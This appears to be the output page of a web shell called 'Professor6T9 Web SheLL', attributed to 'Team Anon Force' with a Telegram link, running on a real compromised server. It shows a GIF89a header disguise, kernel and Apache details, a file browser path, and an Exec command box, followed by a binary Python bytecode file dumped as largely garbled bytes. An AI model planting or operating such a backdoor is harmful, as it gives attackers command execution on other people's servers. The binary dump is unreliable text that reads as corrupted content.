GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
opt
/
ispmanager
/
python3.11
/
lib
/
python3.11
/
__pycache__
[ HOME ]
Exec
Submit
_py_abc.cpython-311.opt-1.pyc
� �����A3� �4 � d dl mZ d� Z G d� de� � ZdS )� )�WeakSetc � � t j S )z�Returns the current ABC cache token. The token is an opaque object (supporting equality testing) identifying the current version of the ABC cache for virtual subclasses. The token changes with every call to ``register()`` on any ABC. )�ABCMeta�_abc_invalidation_counter� � �4/opt/ispmanager/python3.11/lib/python3.11/_py_abc.py�get_cache_tokenr s � � �,�,r c �L � � e Zd ZdZdZ� fd�Zd� Zdd�Zd� Zd� Z d � Z d � Z� xZS )r ah Metaclass for defining Abstract Base Classes (ABCs). Use this metaclass to create an ABC. An ABC can be subclassed directly, and then acts as a mix-in class. You can also register unrelated concrete classes (even built-in classes) and unrelated ABCs as 'virtual subclasses' -- these and their descendants will be considered subclasses of the registering ABC by the built-in issubclass() function, but the registering ABC won't show up in their MRO (Method Resolution Order) nor will method implementations defined by the registering ABC be callable (not even via super()). r c �� �� t � � j | |||fi |��}d� |� � � D � � }|D ]Y}t |dt � � � � D ]9}t ||d � � }t |dd� � r|� |� � �:�Zt |� � |_ t � � |_ t � � |_ t � � |_ t j |_ |S )Nc �: � h | ]\ }}t |d d� � �|��S )�__isabstractmethod__F)�getattr)�.0�name�values r � <setcomp>z"ABCMeta.__new__.<locals>.<setcomp>&